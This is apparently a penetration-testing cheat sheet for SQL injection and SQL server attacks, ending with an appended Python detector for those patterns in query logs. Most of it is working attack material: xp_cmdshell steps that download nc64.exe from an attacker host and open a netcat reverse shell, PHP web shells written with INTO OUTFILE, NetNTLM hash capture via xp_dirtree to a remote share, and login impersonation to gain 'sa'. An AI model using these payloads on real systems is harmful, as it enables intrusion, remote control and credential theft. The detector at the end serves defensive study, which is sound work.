SQLMap
sqlmap example (WebSocket endpoint, JSON body, MySQL backend):
sqlmap -u ws://soc-player.soccer.htb:9091 --data '{"id": "1234"}' --dbms mysql --batch --level 5 --risk 3
By default, MSSQL uses ports TCP/1433 and UDP/1434, and MySQL uses TCP/3306. However, when MSSQL operates in a "hidden" mode, it uses the TCP/2433 port.
Connecting to SQL service
To connect to MySQL:
mysql -u julio -pPassword123 -h 10.129.20.13
To connect to MSSQL from Windows (sqlcmd):
sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30
To connect to MSSQL from Linux (sqsh):
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h
With Impacket's mssqlclient.py (add -windows-auth to use Windows authentication instead of SQL authentication):
mssqlclient.py -p 1433 julio@10.129.203.7
Default Databases
MySQL
Default system schemas/databases:
- mysql: the system database that contains tables that store information required by the MySQL server
- information_schema: provides access to database metadata
- performance_schema: a feature for monitoring MySQL Server execution at a low level
- sys: a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
MSSQL
Default system schemas/databases:
- master: keeps the information for an instance of SQL Server.
- msdb: used by SQL Server Agent.
- model: a template database copied for each new database.
- resource: a read-only database that keeps the system objects visible in every database on the server in the sys schema.
- tempdb: keeps temporary objects for SQL queries.
RCE
MSSQL
For MSSQL on Windows, a SQL injection can be turned into OS command execution by enabling xp_cmdshell. To get RCE through the injection point:
';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--
';EXEC xp_cmdshell "powershell wget http://<ip>/nc64.exe -o C:\Users\Public\nc64.exe";--
';EXEC xp_cmdshell "C:\Users\Public\nc64.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.245 4444";--
The Public folder is used because it is writeable by all users.
The same steps as separate statements from a direct SQL session:
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
EXEC xp_cmdshell "powershell wget http://<ip>/nc64.exe -o C:\Users\Public\nc64.exe";
EXEC xp_cmdshell "C:\Users\Public\nc64.exe -t -e C:\Windows\System32\cmd.exe <ip> <port>";
MySQL
If the MySQL user has the FILE privilege and the web root is writeable, a PHP file can be written that gives command execution through the web application:
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/webshell.php"
or with UNION:
' union select '<?php system($_GET["cmd"]); ?>' into outfile '/srv/http/shell.php' -- -
Windows:
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "C:/wamp/www/shell.php"
Useful Commands
To list the C:\ directory (MSSQL):
exec xp_dirtree 'c:\'
To list databases (MSSQL):
SELECT name FROM master.dbo.sysdatabases
To show tables:
SELECT table_name FROM <DATABASE>.INFORMATION_SCHEMA.TABLES
To concatenate columns (UNION injection):
union select 1,concat(username,':',password),3,4,5,6 from users--
To show tables and their ids (MSSQL, here for the streamio database):
union select 1,(select string_agg(concat(name,':',id),'|') from streamio..sysobjects where xtype='u'),3,4,5,6-- -
To test xp_cmdshell:
EXEC xp_cmdshell 'ping 10.10.14.8';
On the attacker machine (listening for the pings on tun0):
sudo tcpdump -i tun0 icmp
To write a file:
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
To capture the NetNTLM hash of the SQL Server service account (the server authenticates to the attacker's share):
Target:
EXEC master..xp_dirtree '\\10.10.14.113\share\'
Attacker:
sudo responder -A -I tun0
Impersonation:
Check which logins we can impersonate:
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
To impersonate:
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
Verifying current user and role (sqlcmd session):
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
go
Linked Database
To list linked servers:
SELECT srvname, isremote FROM sysservers
Enable xp_cmdshell
EXEC master.dbo.sp_configure 'show advanced options', 1;
RECONFIGURE;
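Added example (not part of the original cheat sheet): a small Python detector that flags the statement patterns from the RCE, "To get hash", Impersonation and MySQL webshell sections when run over captured query logs. The 'timestamp|login|statement' line format, the sample entries and the rule names are constructed for this example, not a vendor log format.

```python
import re

# Each regex is matched case-insensitively against one captured SQL statement
# (SQL Server Audit, MySQL general log, WAF capture). Rule names are local labels.
RULES = [
    # sp_configure turning xp_cmdshell on
    ("xp_cmdshell_enable", r"sp_configure\s+'xp_cmdshell'\s*,\s*1"),
    # xp_cmdshell invoked with an argument
    ("xp_cmdshell_exec", r"\bxp_cmdshell\s+\S"),
    # xp_dirtree / xp_fileexist / xp_subdirs aimed at a UNC share: NetNTLM capture attempt
    ("unc_path_coercion", r"xp_(dirtree|fileexist|subdirs)\s+'\\\\[^']+'"),
    # login-level impersonation
    ("login_impersonation", r"execute\s+as\s+login\s*="),
    # MySQL INTO OUTFILE / DUMPFILE writing a server-side script (web shell)
    ("outfile_webshell", r"into\s+(out|dump)file\s+['\"][^'\"]*\.(php|jsp|aspx?)['\"]"),
]
COMPILED = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in RULES]

def classify(statement):
    """Return the names of every rule the statement triggers (empty list if benign)."""
    return [name for name, rx in COMPILED if rx.search(statement)]

def scan(log_lines):
    """Parse constructed 'timestamp|login|statement' lines; return (timestamp, login, rule) hits."""
    hits = []
    for line in log_lines:
        parts = line.split("|", 2)        # the statement itself may contain '|'
        if len(parts) != 3:
            continue                      # malformed line: skip rather than crash
        ts, login, stmt = (p.strip() for p in parts)
        for rule in classify(stmt):
            hits.append((ts, login, rule))
    return hits

# Constructed sample log (not real audit data), mirroring the commands on this page.
SAMPLE_LOG = [
    "2024-01-01T10:00:00|webapp|SELECT name FROM master.dbo.sysdatabases",
    "2024-01-01T10:00:05|webapp|EXEC sp_configure 'show advanced options',1;RECONFIGURE;"
    "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;",
    "2024-01-01T10:00:07|webapp|EXEC xp_cmdshell 'ping 10.10.14.8';",
    "2024-01-01T10:00:09|webapp|EXEC master..xp_dirtree '\\\\10.10.14.113\\share\\'",
    "2024-01-01T10:00:12|webapp|EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER;",
    "2024-01-01T10:00:15|www|SELECT \"<?php system($_GET['cmd']);?>\" INTO OUTFILE \"/var/www/html/webshell.php\"",
    "garbage line with no separators",
]

if __name__ == "__main__":
    for ts, login, rule in scan(SAMPLE_LOG):
        print(f"{ts} login={login} rule={rule}")
```

A local-path xp_dirtree listing (the 'c:\' check above) deliberately does not trigger the UNC rule, so only the coercion to a remote share is flagged.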